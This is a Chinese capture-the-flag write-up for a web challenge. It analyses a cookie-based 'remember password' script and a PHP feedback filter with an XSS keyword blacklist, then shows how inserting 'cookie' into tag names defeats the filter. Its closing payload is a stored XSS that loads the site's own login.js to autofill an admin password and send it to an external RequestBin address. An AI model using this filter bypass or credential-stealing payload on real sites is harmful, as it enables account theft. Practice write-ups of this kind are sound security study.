登录页面f12可以看到<script src="./js/login.js"></script>
,访问可以看到部分源码:
if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++) { var arr = cookies[i].split('='); var key = arr[0]; cookie[key] = arr[1]; } if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){ document.getElementsByName("username")[0].value = cookie['user']; document.getElementsByName("password")[0].value = cookie['psw']; } }
该代码表示其将用户名和密码都填入了表单(记住密码功能).之后随意注册一个用户,登录.进去后告诉我们这题不是注入.点击上方的feedback,发现有个输入框,f12发现注释的地方有源码:
if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie']; foreach ($blacklist as $val) { while(true){ if(stripos($feedback,$val) !== false){ $feedback = str_ireplace($val,"",$feedback); } else{ break; } } }
根据blacklist的内容和输入框可以猜测是xss.代码中对blacklist的过滤只是将其替换为空,很好绕过,例如input写成incookieput即可.(插入cookie是因为cookie是blacklist中的最后一个词,匹配到cookie后循环就结束了.)
看了大佬wp说本题有csp,无法引入外部js,所以从题目本身的js下手.login.js有记住密码功能,于是构造payload写进feedback的输入框中提交,利用buu的RequestBin来接收反馈.
payload:
<inpcookieut type="text" name="username"></inpcookieut> <inpcookieut type="text" name="password"></inpcookieut> <scricookiept scookierc="./js/login.js"></scricookiept> <scricookiept> var passwd = documcookieent.getElemcookieentsByName("password")[0].value; documcookieent.locacookietion="http://http.requestbin.buuoj.cn/s4dpjps4/?a="+passwd; </scricookiept>
提交成功后稍等一段时间,在requestbin就能看到flag了.
No responses yet